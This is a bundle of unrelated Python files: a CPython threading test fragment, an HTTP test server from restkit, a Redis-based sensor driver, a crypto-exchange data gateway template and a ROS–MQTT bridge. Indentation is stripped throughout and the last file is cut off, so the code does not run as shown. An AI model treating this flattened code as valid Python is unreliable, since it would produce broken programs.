import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
if __name__ == "__main__":
unittest.main()
|
_updates.py
|
from settings import settings
import os
import threading
def update_collection_check(self):
if self.sav_dir_check():
collection = self.update_collection()
else:
self.sav_dir_warning()
def update_collection(self):
self.dbManager.create_connection()
self.sav_dir = settings.read_settings()
list_folders = os.listdir(self.sav_dir)
self.dbManager.delete_table()
self.dbManager.create_table()
for folder in list_folders:
folder_path = self.get_folder_path(self.sav_dir, folder)
amount_of_pics_in_folder = len(next(os.walk(folder_path))[2])
self.dbManager.add_character(folder, amount_of_pics_in_folder)
self.dbManager.close_connection()
def update_suggestions(self):
self.suggestionUpdater.reset_suggestion_table()
self.download_thread = threading.Thread(target=self.mainPageSuggestionsUpdater.start_threads)
self.check_thread = threading.Thread(target=self.check_if_done)
self.start_gif()
self.download_thread.start()
self.check_thread.start()
|
_server_test.py
|
# -*- coding: utf-8 -
#
# Copyright (c) 2008 (c) Benoit Chesneau <benoitc@e-engura.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
import cgi
import os
import socket
import tempfile
import threading
import unittest
import urllib.parse
import http.cookies
try:
from urllib.parse import parse_qsl, parse_qs
except ImportError:
from cgi import parse_qsl, parse_qs
import urllib.request, urllib.parse, urllib.error
from restkit.util import to_bytestring
HOST = 'localhost'
PORT = (os.getpid() % 31000) + 1024
class HTTPTestHandler(BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.auth = b'Basic ' + base64.encodebytes(b'test:test')[:-1]
self.count = 0
BaseHTTPRequestHandler.__init__(self, request, client_address, server)
def do_GET(self):
self.parsed_uri = urllib.parse.urlparse(urllib.parse.unquote(self.path))
self.query = {}
for k, v in parse_qsl(self.parsed_uri[4]):
self.query[k] = v.decode('utf-8')
path = self.parsed_uri[2]
if path == "/":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "welcome")
elif path == "/unicode":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "éàù@")
elif path == "/json":
content_type = self.headers.get('content-type', 'text/plain')
if content_type != "application/json":
self.error_Response("bad type")
else:
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/éàù":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/test":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/query":
test = self.query.get("test", False)
if test and test == "testing":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/qint":
test = self.query.get("test", False)
if test and test == "1":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/auth":
extra_headers = [('Content-type', 'text/plain')]
if not 'Authorization' in self.headers:
realm = "test"
extra_headers.append(('WWW-Authenticate', 'Basic realm="%s"' % realm))
self._respond(401, extra_headers, "")
else:
auth = self.headers['Authorization'][len('Basic')+1:]
auth = base64.b64decode(auth).split(':')
if auth[0] == "test" and auth[1] == "test":
self._respond(200, extra_headers, "ok")
else:
self._respond(403, extra_headers, "niet!")
elif path == "/redirect":
extra_headers = [('Content-type', 'text/plain'),
('Location', '/complete_redirect')]
self._respond(301, extra_headers, "")
elif path == "/complete_redirect":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/redirect_to_url":
extra_headers = [('Content-type', 'text/plain'),
('Location', 'http://localhost:%s/complete_redirect' % PORT)]
self._respond(301, extra_headers, "")
elif path == "/pool":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/cookie":
c = http.cookies.SimpleCookie()
c["fig"] = "newton"
c['fig']['path'] = "/"
for k in list(c.keys()):
extra_headers = [('Set-Cookie', str(c[k].output(header='')))]
self._respond(200, extra_headers, "ok")
elif path == "/cookies":
c = http.cookies.SimpleCookie()
c["fig"] = "newton"
c['fig']['path'] = "/"
c["sugar"] = "wafer"
c['sugar']['path'] = "/"
extra_headers = []
for k in list(c.keys()):
extra_headers.append(('Set-Cookie', str(c[k].output(header=''))))
self._respond(200, extra_headers, "ok")
else:
self._respond(404,
[('Content-type', 'text/plain')], "Not Found" )
def do_POST(self):
self.parsed_uri = urllib.parse.urlparse(self.path)
self.query = {}
for k, v in parse_qsl(self.parsed_uri[4]):
self.query[k] = v.decode('utf-8')
path = self.parsed_uri[2]
extra_headers = []
if path == "/":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', '-1'))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/bytestring":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', '-1'))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/unicode":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', '-1'))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/json":
content_type = self.headers.get('content-type', 'text/plain')
if content_type != "application/json":
self.error_Response("bad type: %s" % content_type)
else:
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/empty":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
if body == "":
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/query":
test = self.query.get("test", False)
if test and test == "testing":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/form":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
form = parse_qs(body)
if form['a'] == ["a"] and form["b"] == ["b"]:
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/multivalueform":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
form = parse_qs(body)
if form['a'] == ["a", "c"] and form["b"] == ["b"]:
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/multipart":
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
content_length = int(self.headers.get('Content-length', 0))
if ctype == 'multipart/form-data':
req = cgi.parse_multipart(self.rfile, pdict)
body = req['t'][0]
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, body)
else:
self.error_Response()
elif path == "/multipart2":
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
content_length = int(self.headers.get('Content-length', 0))
if ctype == 'multipart/form-data':
req = cgi.parse_multipart(self.rfile, pdict)
f = req['f'][0]
if not req['a'] == ['aa']:
self.error_Response()
if not req['b'] == ['bb','éàù@']:
self.error_Response()
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, str(len(f)))
else:
self.error_Response()
elif path == "/multipart3":
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
content_length = int(self.headers.get('Content-length', 0))
if ctype == 'multipart/form-data':
req = cgi.parse_multipart(self.rfile, pdict)
f = req['f'][0]
if not req['a'] == ['aa']:
self.error_Response()
if not req['b'] == ['éàù@']:
self.error_Response()
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, str(len(f)))
else:
self.error_Response()
elif path == "/multipart4":
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
content_length = int(self.headers.get('Content-length', 0))
if ctype == 'multipart/form-data':
req = cgi.parse_multipart(self.rfile, pdict)
f = req['f'][0]
if not req['a'] == ['aa']:
self.error_Response()
if not req['b'] == ['éàù@']:
self.error_Response()
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, f)
else:
self.error_Response()
elif path == "/1M":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, str(len(body)))
elif path == "/large":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-Type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
extra_headers.append(('Content-Length', str(len(body))))
self._respond(200, extra_headers, body)
elif path == "/list":
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
extra_headers.append(('Content-Length', str(len(body))))
self._respond(200, extra_headers, body)
elif path == "/chunked":
te = (self.headers.get("transfer-encoding") == "chunked")
if te:
body = self.rfile.read(29)
extra_headers.append(('Content-Length', "29"))
self._respond(200, extra_headers, body)
else:
self.error_Response()
else:
self.error_Response('Bad path')
do_PUT = do_POST
def do_DELETE(self):
if self.path == "/delete":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, '')
else:
self.error_Response()
def do_HEAD(self):
if self.path == "/ok":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, '')
else:
self.error_Response()
def error_Response(self, message=None):
req = [
('HTTP method', self.command),
('path', self.path),
]
if message:
req.append(('message', message))
body_parts = ['Bad request:\r\n']
for k, v in req:
body_parts.append(' %s: %s\r\n' % (k, v))
body = ''.join(body_parts)
self._respond(400, [('Content-type', 'text/plain'),
('Content-Length', str(len(body)))], body)
def _respond(self, http_code, extra_headers, body):
self.send_response(http_code)
keys = []
for k, v in extra_headers:
self.send_header(k, v)
keys.append(k)
if body:
body = to_bytestring(body)
#if body and "Content-Length" not in keys:
# self.send_header("Content-Length", len(body))
self.end_headers()
self.wfile.write(body)
# self.wfile.close()
def finish(self):
if not self.wfile.closed:
self.wfile.flush()
# self.wfile.close()
# self.rfile.close()
server_thread = None
def run_server_test():
global server_thread
if server_thread is not None:
return
server = HTTPServer((HOST, PORT), HTTPTestHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.setDaemon(True)
server_thread.start()
|
driver.py
|
from redis import Redis
from threading import Thread
from bltouch import config as cfg
from bltouch import command_getter, data_producer
from bltouch import sensor
def main():
print(cfg.REDIS_HOST, cfg.REDIS_PORT, cfg.REDIS_PASSWORD)
redis_instance = Redis(cfg.REDIS_HOST, cfg.REDIS_PORT, cfg.REDIS_PASSWORD)
blt=sensor.BLTouch(port=cfg.BLTOUCH_SERIAL_PORT, baudrate=cfg.BLTOUCH_BAUDRATE)
getter = command_getter.CommandGetter(
redis_instance,
channel="device-command-bltouch",
sensor=blt
)
producer = data_producer.DataProducer(
redis_instance,
channel="device-data-bltouch",
sensor=blt
)
getter_thread = Thread(target=getter.loop)
producer_thread = Thread(target=producer.loop)
getter_thread.start()
producer_thread.start()
|
restful_template.py
|
from bitfeeds.socket.restful import RESTfulApiSocket
from bitfeeds.exchange import ExchangeGateway
from bitfeeds.market_data import L2Depth, Trade
from bitfeeds.util import Logger
from bitfeeds.instrument import Instrument
from bitfeeds.sql_storage_template import SqlStorageTemplate
from functools import partial
from datetime import datetime
from multiprocessing import Process
import time
class RESTfulApiTemplate(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
super(RESTfulApiTemplate).__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_order_book_timestamp_field_name(cls):
return 'date'
@classmethod
def get_trades_timestamp_field_name(cls):
return 'date'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'type'
@classmethod
def get_trade_id_field_name(cls):
return 'tid'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://data.btcchina.com/data/orderbook?limit=5&market=%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if int(instmt.get_exch_trade_id()) > 0:
return "https://data.btcchina.com/data/historydata?market=%s&since=%s" % \
(instmt.get_instmt_code(), instmt.get_exch_trade_id())
else:
return "https://data.btcchina.com/data/historydata?limit=100&market=%s" % \
(instmt.get_instmt_code())
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
keys = list(raw.keys())
if cls.get_order_book_timestamp_field_name() in keys and \
cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# Date time
date_time = float(raw[cls.get_order_book_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
l2_depth.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[0], reverse=True)
for i in range(0, 5):
l2_depth.bids[i].price = float(bids[i][0]) if type(bids[i][0]) != float else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if type(bids[i][1]) != float else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[0])
for i in range(0, 5):
l2_depth.asks[i].price = float(asks[i][0]) if type(asks[i][0]) != float else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if type(asks[i][1]) != float else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trades_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if len(res) > 0:
for t in res:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwTemplate(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_storages):
"""
Constructor
:param db_storage: Database storage
"""
ExchangeGateway.__init__(self, ExchGwApiTemplate(), db_storages)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Template'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = Process(target=partial(self.get_order_book_worker, instmt))
t2 = Process(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Template'
instmt_name = 'BTCCNY'
instmt_code = 'btccny'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_storage = SqlStorageTemplate()
exch = ExchGwTemplate([db_storage])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
bridge.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from abc import ABCMeta, abstractmethod
import inject
import paho.mqtt.client as mqtt
import rospy
from .util import lookup_object, extract_values, populate_instance
from threading import Condition
from queue import Queue
from uuid import uuid4
from threading import Thread
def create_bridge(factory, **kwargs):
u""" bridge generator function
:param (str|class) factory: Bridge class
:param kwargs: bridge-specific arguments
:return Bridge: bridge object
"""
if isinstance(factory, basestring):
factory = lookup_object(factory)
if not issubclass(factory, Bridge):
raise ValueError("factory should be Bridge subclass")
return factory(**kwargs)
class Bridge(object):
u""" Bridge base class
:param mqtt.Client _mqtt_client: MQTT client
:param _serialize: message serialize callable
:param _deserialize: message deserialize callable
"""
__metaclass__ = ABCMeta
_mqtt_client = inject.attr(mqtt.Client)
_serialize = inject.attr('serializer')
_deserialize = inject.attr('deserializer')
_extract_private_path = inject.attr('mqtt_private_path_extractor')
class DynamicBridgeServer(Bridge):
u""" Dynamic Bridge Server that serves as the remote end to PublishBridge
and SubscribeBridge, as well as the RemoteService. Should always be instantiated if
indeed the purpose is bridging between ROS-sides.
"""
def __init__(self, control_topic="__dynamic_server"):
self._control_topic = control_topic + '/topic/#'
self._service_topic = control_topic + '/service/request/#'
self._register_service_topic = control_topic + '/service/register/#'
self._mqtt_client.subscribe(self._control_topic, qos=2)
self._mqtt_client.message_callback_add(self._control_topic, self._callback_mqtt_topic)
self._mqtt_client.subscribe(self._service_topic, qos=2)
self._mqtt_client.message_callback_add(self._service_topic, self._callback_mqtt_service)
self._mqtt_client.subscribe(self._register_service_topic, qos=2)
self._mqtt_client.message_callback_add(self._register_service_topic, self._register_service)
self._bridges = set([])
rospy.loginfo('DynamicBridgeServer started on control topic %s' % control_topic)
def _callback_mqtt_service(self, client, userdata, mqtt_msg):
t = Thread(target=self.__callback_mqtt_service, args=(userdata, mqtt_msg))
t.start()
def __callback_mqtt_service(self, userdata, mqtt_msg):
rospy.logdebug("MQTT service call received from {}".format(mqtt_msg.topic))
msg_dict = self._deserialize(mqtt_msg.payload)
service_type = lookup_object(msg_dict['type'])
request_type = lookup_object(msg_dict['type'] + 'Request')
# create request object
request = request_type()
# and populate it
populate_instance(msg_dict['args'], request)
response_type = lookup_object(msg_dict['type'] + 'Response')
# create empty response object
response = response_type()
msg_dict['op'] = 'response'
try:
rospy.logdebug('waiting for service %s' % msg_dict['service'])
rospy.wait_for_service(msg_dict['service'], 1)
service = rospy.ServiceProxy(msg_dict['service'], service_type)
response = service.call(request)
msg_dict['response'] = extract_values(response)
except Exception:
rospy.logerr("Service %s doesn't exist" % msg_dict['service'])
msg_dict['response'] = None
finally:
payload = bytearray(self._serialize(msg_dict))
self._mqtt_client.publish(
topic=msg_dict['response_topic'], payload=payload,
qos=2, retain=False)
def _register_service(self, client, userdata, mqtt_msg):
msg_dict = self._deserialize(mqtt_msg.payload)
if msg_dict['op'] == 'register':
rospy.loginfo("register service proxy")
self._bridges.add(RemoteService(
**msg_dict['args'])
)
def _callback_mqtt_topic(self, client, userdata, mqtt_msg):
u""" callback from MQTT
:param mqtt.Client client: MQTT client used in connection
:param userdata: user defined data
:param mqtt.MQTTMessage mqtt_msg: MQTT message
"""
msg_dict = self._deserialize(mqtt_msg.payload)
def __bridge_exists(args):
for __bridge in self._bridges:
if __bridge._topic_from == args['topic_to'] and\
__bridge._topic_to == args['topic_from']:
return True
return False
if msg_dict['op'] == 'mqtt2ros_subscribe':
if not __bridge_exists(msg_dict['args']):
rospy.loginfo("forward mqtt topic to ros %s" % (
msg_dict['args']))
self._bridges.add(MqttToRosBridge(
**msg_dict['args'])
)
else:
rospy.loginfo("bridge for %s already initialised" % (
msg_dict['args']))
if msg_dict['op'] == 'ros2mqtt_subscribe':
if not __bridge_exists(msg_dict['args']):
rospy.loginfo("forward ros topic to mqtt %s" % (
msg_dict['args']))
self._bridges.add(RosToMqttBridge(
**msg_dict['args'])
)
else:
rospy.logwarn("bridge for %s already initialised" % (
msg_dict['args']))
class RosToMqttBridge(Bridge):
u""" Bridge from ROS topic to MQTT
:param str topic_from: incoming ROS topic path
:param str topic_to: outgoing MQTT topic path
:param class msg_type: subclass of ROS Message
:param (float|None) frequency: publish frequency
:param bool latched: retain the last message on the MQTT topic (default: False)
:param int qos: MQTT quality of service (default: 0, max: 2)
"""
def __init__(self, topic_from, topic_to, msg_type, frequency=None, latched=False, qos=0):
self._topic_from = topic_from
self._topic_to = self._extract_private_path(topic_to)
self._last_published = rospy.get_time()
self._interval = 0 if frequency is None else 1.0 / frequency
self._latched = latched
self._qos = qos
if isinstance(msg_type, basestring):
msg_type = lookup_object(msg_type)
if not issubclass(msg_type, rospy.Message):
raise TypeError(
"msg_type should be rospy.Message instance or its string"
"reprensentation")
rospy.Subscriber(topic_from, msg_type, self._callback_ros)
def _callback_ros(self, msg):
rospy.logdebug("ROS received from {}".format(self._topic_from))
now = rospy.get_time()
if now - self._last_published >= self._interval:
self._publish(msg)
self._last_published = now
def _publish(self, msg):
payload = bytearray(self._serialize(extract_values(msg)))
self._mqtt_client.publish(
topic=self._topic_to, payload=payload,
qos=self._qos, retain=self._latched)
class MqttToRosBridge(Bridge):
u""" Bridge from MQTT to ROS topic
:param str topic_from: incoming MQTT topic path
:param str topic_to: outgoing ROS topic path
:param class msg_type: subclass of ROS Message
:param (float|None) frequency: publish frequency
:param int queue_size: ROS publisher's queue size (default: 10)
:param bool latch: latch the ROS topic (default: False)
:param int qos: MQTT quality of service (default: 0, max: 2)
"""
def __init__(self, topic_from, topic_to, msg_type, frequency=None,
queue_size=10, latched=False, qos=0):
self._topic_from = self._extract_private_path(topic_from)
self._topic_to = topic_to
if isinstance(msg_type, basestring):
msg_type = lookup_object(msg_type)
if not issubclass(msg_type, rospy.Message):
raise TypeError(
"msg_type should be rospy.Message instance or its string"
"reprensentation")
self._msg_type = msg_type
self._queue_size = queue_size
self._latched = latched
self._qos = qos
self._last_published = rospy.get_time()
self._interval = None if frequency is None else 1.0 / frequency
# Adding the correct topic to subscribe to
self._mqtt_client.subscribe(self._topic_from, qos=self._qos)
self._mqtt_client.message_callback_add(self._topic_from, self._callback_mqtt)
self._publisher = rospy.Publisher(
self._topic_to, self._msg_type, queue_size=self._queue_size, latch=self._latched)
def _callback_mqtt(self, client, userdata, mqtt_msg):
u""" callback from MQTT
:param mqtt.Client client: MQTT client used in connection
:param userdata: user defined data
:param mqtt.MQTTMessage mqtt_msg: MQTT message
"""
rospy.logdebug("MQTT received from {}".format(mqtt_msg.topic))
now = rospy.get_time()
if self._interval is None or now - self._last_published >= self._interval:
try:
ros_msg = self._create_ros_message(mqtt_msg)
self._publisher.publish(ros_msg)
self._last_published = now
except Exception as e:
rospy.logerr(e)
def _create_ros_message(self, mqtt_msg):
u""" create ROS message from MQTT payload
:param mqtt.Message mqtt_msg: MQTT Message
:return rospy.Message: ROS Message
"""
msg_dict = self._deserialize(mqtt_msg.payload)
return populate_instance(msg_dict, self._msg_type())
class SubscribeBridge(MqttToRosBridge):
def __init__(self, topic_from, topic_to, msg_type, control_topic="__dynamic_server", frequency=None, latched=False, qos=0):
self._control_topic = control_topic + '/topic/' + topic_from.replace('/', '_')
self._mqtt_topic = control_topic + '_DATA_' + (topic_from + "_TO_" + topic_to).replace('/','_')
super(SubscribeBridge, self).__init__(self._mqtt_topic, topic_to, msg_type, frequency, latched, qos)
rospy.loginfo('SubscribeBridge: subscribe ROS topic %s to topic %s via MQTT %s' %
(topic_from, topic_to, self._mqtt_topic)
)
cmd = {
'op': 'ros2mqtt_subscribe',
'args': {
'topic_from': topic_from,
'topic_to': self._mqtt_topic,
'msg_type': msg_type,
'frequency': frequency,
'latched': latched,
'qos': qos
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._control_topic, payload=payload,
qos=2, retain=False)
class PublishBridge(RosToMqttBridge):
def __init__(self, topic_from, topic_to, msg_type, control_topic="__dynamic_server", frequency=None, latched=False, qos=0):
self._control_topic = control_topic + '/topic/' + topic_to.replace('/', '_')
self._mqtt_topic = control_topic + '_DATA_' + (topic_from + "_TO_" + topic_to).replace('/','_')
super(PublishBridge, self).__init__(topic_from, self._mqtt_topic, msg_type, frequency, latched, qos)
rospy.loginfo('PublishBridge: publish from ROS topic %s to topic %s via MQTT %s' %
(topic_from, topic_to, self._mqtt_topic)
)
cmd = {
'op': 'mqtt2ros_subscribe',
'args': {
'topic_from': self._mqtt_topic,
'topic_to': topic_to,
'msg_type': msg_type,
'frequency': frequency,
'latched': latched,
'qos': qos
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._control_topic, payload=payload,
qos=2, retain=False)
class LocalServiceProxy(Bridge):
def __init__(self, local_server, remote_server, srv_type, control_topic="__remote_server"):
self._register_service_topic = control_topic + '/service/register/' + (local_server + "_TO_" + remote_server).replace('/','_')
rospy.loginfo('LocalServiceProxy: offer remote access to ROS service %s as %s via MQTT' %
(local_server, remote_server)
)
cmd = {
'op': 'register',
'args': {
'local_server': remote_server,
'remote_server': local_server,
'srv_type': srv_type,
'control_topic': control_topic
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._register_service_topic, payload=payload,
qos=2, retain=False)
class RemoteService(Bridge):
def __init__(self, local_server, remote_server, srv_type, control_topic="__remote_server"):
self._local_server = local_server
self._remote_server = remote_server
self._control_topic = control_topic
self._mqtt_topic_request = self._control_topic + '/service/request/' + (local_server + "_TO_" + remote_server).replace('/','_')
